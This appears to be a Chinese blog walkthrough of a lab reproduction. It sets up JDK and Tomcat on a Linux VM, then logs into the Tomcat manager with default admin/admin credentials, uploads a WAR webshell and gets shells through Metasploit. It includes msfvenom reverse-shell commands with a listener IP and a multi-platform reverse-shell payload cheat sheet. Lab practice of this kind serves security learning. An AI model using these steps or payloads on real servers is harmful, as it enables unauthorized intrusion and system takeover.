TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>

操作流程(环境搭建-实践操作)

在linux虚拟机上安装jdk

新创建linux虚拟机

通过mobaxterm连接虚拟机


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第1张图片

导入tomcat安装包与jdk安装包

apache-tomcat-7.0.92.tar

jdk-8u201-linux-x64.tar.gz


v2-00aca0442fdfd7cb9be4889721d40248_b.jpg

查询环境中是否存在java

yum list installed |grep java


v2-0846ad52389d8e52b4932b3aad2fbdd5_b.jpg

创建jdk的路径 /usr/java/

mkdir /usr/java/


v2-6620a0ba154aef151e529b66735edb31_b.jpg


v2-3f21b04db8c336303df286b1a24f70f0_b.jpg

将jdk包解压

tar -zxvf jdk-8u201-linux-x64.tar.gz


v2-abbd9c34b70e41a46b9c6153fe5e2827_b.jpg


v2-7f41013d55db1e0e12d008a7761b44d5_b.jpg

将jdk 1.8.0_201移动到创建的?usr/java/下

mv jdk1.8.0_201/ /usr/java


v2-2d399a7d8af6f0ec18a7adb668670753_b.jpg

建立短链接

ln -s /usr/java/jdk1.8.0_201/ /usr/jdk


v2-b7892cbb5be621b452dec62350da8cb4_b.jpg

编辑配置文件,配置环境变量

vim /etc/profile

添加

export JAVA_HOME=/usr/java/jdk1.8.0_201

export JRE_HOME=${JAVA_HOME}/jre

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

export PATH=${JAVA_HOME}/bin:$PATH


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第2张图片

重新加载配置文件/etc/profile

source /etc/profile

也可以使用sudo shutdown -r now重启,但是客户环境的服务器一般是不允许重启的


v2-ccc5b152de0a449cf3e691924ebca27c_b.jpg

查看java版本


v2-8c083df09d1c134cc2eff33907492889_b.jpg

运行命令 javac


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第3张图片

在linux虚拟机上安装tomcat

创建一个tomcat目录

mkdir /usr/tomcat


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第4张图片

解压tomcat安装包


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第5张图片


v2-527c32a19d2bc69256fd42edc8b35381_b.jpg

解压成功

将解压内容移动至 /usr/tomcat

mv apache-tomcat-7.0.92/ /usr/tomcat


v2-6a1816897866e09f705c937bee056c0f_b.jpg

生成链接以便版本升级

ln -s apache-tomcat-7.0.92 server


v2-88a0053587056cc162e613f7f5872622_b.jpg

启动tomcat

在usr/tomcat/server/bin 执行 ./startup.sh


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第6张图片


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第7张图片

关闭防火墙(考虑到安全因素,不可取)


v2-f13b3142b09250d9bd8923edfddc9812_b.jpg

或者编辑防火墙配置文件

vim /etc/sysconfig/iptables

添加需要的端口


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第8张图片

添加的端口需要在

-A INPUT -j REJECT --reject-with icmp-host-prohibited

之上才会生效

重启防火墙服务


v2-aeb284566b348d94584f61f3484e2871_b.jpg

查看防火墙端口状态


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第9张图片


访问页面


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第10张图片

演练开始:

cnblogs.com/bmjoker/p/9

环境搭建好了

http://192.168.0.106:8080


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第11张图片


一、上传war包(马儿连接)

1、尝试弱口令默认密码登录 admin/admin


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第12张图片


2、成功登录manager管理后台


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第13张图片


3、上传war包

上传成功解析成功


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第14张图片


4、访问war网站内容(内容解析)

192.168.0.106:8080/war/


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第15张图片


5、可以执行命令(菜刀连接)


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第16张图片


获取到系统的权限


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第17张图片



二、MSF反弹getshell

exploit/multi/http/tomcat_mgr_upload


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第18张图片


执行ls


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第19张图片


还能查看 etc/passwd


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第20张图片


三、msfvenom来作一个后门反弹webshell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.144 LPORT=1111 -f elf > shell.elf



v2-e61110d9aead6114e069b6a2b87b5d6a_b.jpg


其他类型的制作的msf反弹webshell

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.phpcat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

执行


v2-40ee2b5a78ee743af837c2c889c59e97_b.jpg


反弹回来了


v2-0f77c67c96acbeeea8648ad16f5c032b_b.jpg



总结:

1、就是靶站搭建的时候会刚刚下载的tomcat的默认的没有manger和其他的admin的管理界面的,需要自己器调整conf/tomcat-user.xml才能进行后续的实验。


TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>_第21张图片


2、就是需要手动的安装JDK8以上。

3、开始在靶机上面开启服务一直不能msf连接上,需要重启,调节Linux的net work设置,获取同一网段,才好后面的反弹shell的操作。

4、注意msf的webshell制作过程,那个lhost和lport的IP上远程监听的IP。

jianshu.com/u/bf0e38a8d(简书主页)

zhuanlan.zhihu.com/c_17(知乎主页)

你可能感兴趣的:(linux,java,centos,tomcat,hadoop)